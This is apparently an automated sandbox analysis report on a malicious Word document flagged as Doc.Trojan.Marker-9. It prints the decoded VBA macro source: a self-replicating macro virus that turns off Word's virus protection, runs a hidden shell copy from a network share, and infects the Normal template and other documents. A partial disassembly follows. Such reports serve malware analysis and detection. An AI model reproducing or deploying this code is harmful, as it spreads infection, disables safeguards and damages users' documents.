MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Office document containing VBA macros. The macros attempt to copy a file named 'NetSetup.log' from a network share to the local system and then set this copied file as the system wallpaper. This behavior suggests an attempt to establish persistence or download and execute a second-stage payload.
Heuristics 3
-
ClamAV: Doc.Trojan.Marker-9 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-9
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9953 bytes |
SHA-256: 1fff0747537d285e7214430d260014ae89468422c04a5072272a376894ea13de |
|||
|
Detection
ClamAV:
Doc.Trojan.Marker-9
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Application.ScreenUpdating = False
ActiveWindow.WindowState = wdWindowStateMinimize
Const Kuku = "Black Wednesday!"
'Declare Variables
Dim SaveDoc, SaveNormalTempl, DocInfected, NormalTemplInfected As Boolean
Dim ActDoc, NormTempl As Object
Dim MyCod, UserAddress, LogData, LogFile As String
Dim a1, FileLocal, FileServer As Integer
'Initialize Variables
Set ActDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NormTempl = NormalTemplate.VBProject.VBComponents.Item(1)
DocInfected = ActDoc.CodeModule.Find(Kuku, 1, 1, 10000, 10000)
NormalTemplInfected = NormTempl.CodeModule.Find(Kuku, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
Options.VirusProtection = False
Set fs = Application.FileSearch
With fs
.LookIn = "C:\"
.FileName = "NetSetup.log"
FileLocal = .Execute
End With
With fs
.LookIn = "\\post\temp\1000"
.FileName = "NetSetup.log"
FileServer = .Execute
End With
If FileServer > 0 Then
If (FileLocal <= 0) Then
Shell "command.com /c copy \\post\temp\1000\NetSetup.log c:\NetSetup.log", vbHide
Else
If FileLen("\\post\temp\1000\NetSetup.log") <> FileLen("c:\NetSetup.log") Then
Shell "command.com /c copy \\post\temp\1000\NetSetup.log c:\NetSetup.log", vbHide
End If
End If
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", _
"WallPaper") = "c:\NetSetup.log"
'If (WeekDay(Now()) = vbWednesday) Then
Selection.MoveDown Unit:=wdLine, Count:=20, Extend:=wdExtend
Selection.Range.Case = wdNextCase
ActiveDocument.Save
'End If
'Make sure that some conditions are true before we continue infecting anything
If (DocInfected = True Xor NormalTemplInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
'Infect the NormalTemplate
If DocInfected = True Then
SaveNormalTempl = NormalTemplate.Saved
MyCod = ActDoc.CodeModule.Lines(1, ActDoc.CodeModule.CountOfLines)
a1 = NormTempl.CodeModule.CountOfLines
NormTempl.CodeModule.DeleteLines 1, a1
NormTempl.CodeModule.AddFromString MyCod
If SaveNormalTempl = True Then NormalTemplate.Save
End If
'Infect the ActiveDocument
If NormalTemplInfected = True And _
(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
ActiveDocument.Saved = False) Then
SaveDoc = ActiveDocument.Saved
OurCode = NormTempl.CodeModule.Lines(1, NormTempl.CodeModule.CountOfLines)
a1 = ActDoc.CodeModule.CountOfLines
ActDoc.CodeModule.DeleteLines 1, a1
ActDoc.CodeModule.AddFromString OurCode
If SaveDoc = True Then ActiveDocument.Save
End If
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/2e3209c56e084d8e96203cce10096b5d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 9230 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' Line #2:
' OnError (Resume Next)
' Line #3:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #4:
' Ld wdWindowStateMinimize
' Ld ActiveWindow
' MemSt WindowState
' Line #5:
' Line #6:
' Dim (Const)
' LitStr 0x0010 "Black Wednesday!"
' VarDefn Kuku
' Line #7:
' Line #8:
' QuoteRem 0x0000 0x0011 "Declare Variables"
' Line #9:
' Dim
' VarDefn SaveDoc
' VarDefn SaveNormalTempl
' VarDefn DocInfected
' VarDefn NormalTemplInfected (As Boolean)
' Line #10:
' Dim
' VarDefn ActDoc
' VarDefn NormTempl (As Object)
' Line #11:
' Dim
' VarDefn MyCod
' VarDefn UserAddress
' VarDefn LogData
' VarDefn LogFi
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.